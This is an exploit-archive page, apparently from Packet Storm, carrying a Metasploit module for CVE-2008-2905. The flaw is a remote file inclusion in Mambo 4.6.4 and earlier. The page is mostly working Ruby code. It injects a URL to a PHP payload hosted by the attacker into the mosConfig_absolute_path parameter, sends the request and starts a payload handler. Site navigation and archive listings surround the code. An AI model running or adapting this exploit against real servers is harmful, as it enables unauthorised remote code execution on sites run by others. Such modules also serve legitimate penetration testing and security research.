Mambo Cache_Lite Class mosConfig_absolute_path Remote File Inclusion

Mambo Cache_Lite Class mosConfig_absolute_path Remote File Inclusion: Posted Oct 30, 2009; Authored by MC; This Metasploit module exploits a remote file inclusion vulnerability in includes/Cache/Lite/Output.php in the Cache_Lite package in Mambo 4.6.4 and earlier.; tags | exploit, remote, php, file inclusion; advisories | CVE-2008-2905; SHA-256 | b2ba8fb8a2e256bd118a58d9cf32de671d3e009067fc8203880b59330d179b63; Download | Favorite | View

Mambo Cache_Lite Class mosConfig_absolute_path Remote File Inclusion

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::PHPInclude

  def initialize(info = {})
    super(update_info(info,  
      'Name'           => 'Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include.',
      'Description'    => %q{
          This module exploits a remote file inclusion vulnerability in
          includes/Cache/Lite/Output.php in the Cache_Lite package in Mambo 
          4.6.4 and earlier.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision:$',
      'References'     =>
        [
          [ 'CVE', '2008-2905' ],
          [ 'BID', '29716' ],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Compat'      => 
            {
              'ConnectionType' => 'find',
            },
          'Space'       => 32768,
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => 'Jun 14 2008',
      'DefaultTarget' => 0))
      
      register_options(
        [
          OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/includes/Cache/Lite/Output.php?mosConfig_absolute_path=!URL!"]),
        ], self.class)
  end

  def php_exploit

    timeout = 0.01
    uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
    print_status("Trying uri #{uri}")

    response = send_request_raw( {
        'global' => true,
        'uri' => uri,
      },timeout)

    if response and response.code != 200
      print_error("Server returned non-200 status code (#{response.code})")
    end
    
    handler
  end

end

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Mambo Cache_Lite Class mosConfig_absolute_path Remote File Inclusion

Mambo Cache_Lite Class mosConfig_absolute_path Remote File Inclusion

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Mambo Cache_Lite Class mosConfig_absolute_path Remote File Inclusion

Share This

Mambo Cache_Lite Class mosConfig_absolute_path Remote File Inclusion

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems